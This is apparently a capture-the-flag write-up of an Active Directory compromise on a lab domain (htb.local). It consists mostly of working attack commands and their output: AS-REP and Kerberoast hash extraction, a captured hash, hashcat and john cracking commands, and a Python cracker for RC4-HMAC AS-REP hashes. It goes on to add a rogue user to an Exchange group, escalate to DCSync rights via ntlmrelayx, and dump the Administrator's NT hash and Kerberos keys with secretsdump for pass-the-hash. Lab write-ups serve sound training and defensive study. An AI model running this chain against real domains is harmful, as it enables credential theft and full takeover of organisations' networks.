LDAP normally exposes a lot of information about the AD. If anonymous bind is allowed, much of it can be queried without any credentials, such as user and group information.
Identify Kerberos Service Principal Names (SPNs) tied to accounts using Impacket's GetUserSPNs (Kerberoasting)
# list SPNs tied to accounts (needs a valid domain credential; the script prompts for the password)
impacket-GetUserSPNs -dc-ip <IP> <Domain>/<accountName>
# request the service tickets to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain>/<accountName> -request
The response contains the TGS-REP hashes ($krb5tgs$23$...), which can be cracked offline with hashcat (-m 13100) or john.
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210
# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1
Hashcat - cracking the AS-REP hash
hashcat -m 18200 -a 0 svc_hash passwordlist.txt --force
The $krb5asrep$23$ format is hashcat mode 18200 (AS-REP roast); 13100 is the Kerberoast TGS-REP format ($krb5tgs$23$) and rejects this hash. Run the same command again with --show to print the cracked password from the potfile; --show on its own cracks nothing.
John the Ripper - cracking the AS-REP hash (the krb5asrep format is auto-detected)
john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash
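What hashcat -m 18200 and john actually do with that $krb5asrep$23$ line, as an added example that is not part of the original write-up: derive the RC4-HMAC key (the NT hash) from each candidate password, unwrap the AS-REP enc-part as RFC 4757 describes, and accept the candidate whose HMAC-MD5 checksum verifies. The GetNPUsers hash from above is parsed for its fields; the hash that is cracked is a constructed sample built with the same primitives (the user svc-demo, realm LAB.LOCAL, password "Winter2022!" and the fake enc-part body are assumptions, not data from the box). MD4 is implemented in pure Python because hashlib on OpenSSL 3 often lacks it.

```python
"""Offline check of an AS-REP roast hash in the $krb5asrep$23$ format (hashcat -m 18200).
Added example, not from the original write-up. RC4-HMAC (etype 23) per RFC 4757."""
import hashlib
import hmac
import struct

# RFC 4757 maps the AS-REP enc-part key usage (3 in RFC 4120) to 8 for RC4-HMAC.
AS_REP_KEY_USAGE = 8

# Hash copied verbatim from the GetNPUsers output above.
PAGE_HASH = "$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 ships MD4 only in its legacy provider."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), range(16)),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = list(state)
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                p = (-i) % 4  # the word being updated cycles a, d, c, b
                val = s[p] + fn(s[(p + 1) % 4], s[(p + 2) % 4], s[(p + 3) % 4]) + x[idx] + k
                s[p] = rotl(val & mask, shifts[i % 4])
        state = [(a + b) & mask for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def k1_for(nt: bytes) -> bytes:
    return hmac.new(nt, struct.pack("<I", AS_REP_KEY_USAGE), hashlib.md5).digest()


def rc4_hmac_seal(nt: bytes, plaintext: bytes, confounder: bytes) -> tuple:
    """RFC 4757: checksum = HMAC-MD5(K1, conf||pt); K3 = HMAC-MD5(K1, checksum); ct = RC4(K3, conf||pt)."""
    k1, data = k1_for(nt), confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def build_asrep_hash(user: str, realm: str, password: str, enc_part: bytes, confounder: bytes) -> str:
    checksum, ct = rc4_hmac_seal(nt_hash(password), enc_part, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${ct.hex()}"


def parse_asrep_hash(line: str) -> dict:
    """Split $krb5asrep$23$user@REALM:<checksum hex>$<enc-part hex> into its fields."""
    head, rest = line.strip().split(":", 1)
    parts = head.split("$")
    if len(parts) != 4 or parts[1] != "krb5asrep" or parts[2] != "23":
        raise ValueError("not an etype-23 AS-REP hash")
    user, realm = parts[3].rsplit("@", 1)
    checksum, edata = rest.split("$", 1)
    if len(checksum) != 32:
        raise ValueError("checksum must be 16 bytes (HMAC-MD5)")
    return {"user": user, "realm": realm, "checksum": checksum, "edata": edata}


def check_password(parsed: dict, password: str) -> bool:
    """Decrypt with the candidate's K3 and verify the HMAC-MD5 over the recovered plaintext."""
    k1 = k1_for(nt_hash(password))
    checksum = bytes.fromhex(parsed["checksum"])
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, bytes.fromhex(parsed["edata"]))
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def crack(line: str, wordlist):
    parsed = parse_asrep_hash(line)
    return next((w for w in wordlist if check_password(parsed, w)), None)


# Constructed sample (assumed user, realm, password and enc-part; not captured from a DC).
DEMO_PASSWORD = "Winter2022!"
DEMO_HASH = build_asrep_hash("svc-demo", "LAB.LOCAL", DEMO_PASSWORD,
                             b"\x79\x81\x80" + b"constructed EncASRepPart body", bytes(range(8)))

if __name__ == "__main__":
    page = parse_asrep_hash(PAGE_HASH)
    print(page["user"], page["realm"], len(page["edata"]) // 2, "bytes of enc-part")
    print(crack(DEMO_HASH, ["Password1", "Summer2022", DEMO_PASSWORD, "letmein"]))
```

The checksum verification is the definitive test; hashcat takes a shortcut by decrypting only the first bytes and looking for the ASN.1 header of EncASRepPart (0x79), which is why a wrong mode such as 13100 fails at parse time rather than producing a false result.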
Abusing the privileges of "Account Operators" (see the BloodHound inspection below): we continue the privilege escalation by creating a new domain user, adding it to an Exchange group that holds WriteDACL on the domain object, and using that right to grant the user DCSync (directory replication) permissions.
DCSync attack through the Exchange Trusted Subsystem group
Create domain account
PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain
Impacket NTLM Relay
Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).
# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss
ntlmrelayx only acts once a user authenticates to its SMB/HTTP listener; when the relayed account holds WriteDACL on the domain (bigb0ss does, through the Exchange group), --escalate-user adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights for bigb0ss to the domain ACL, which is exactly what DCSync requires.
DCSync attack - dump the Administrator LM/NT hash and Kerberos keys
# kali terminal2 (secretsdump.py in the examples directory and impacket-secretsdump are the same script)
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...
The LM part (aad3b435b51404eeaad3b435b51404ee) is the empty LM hash; the NT hash can be used directly for pass-the-hash (impacket tools accept it via -hashes LM:NT) without cracking it.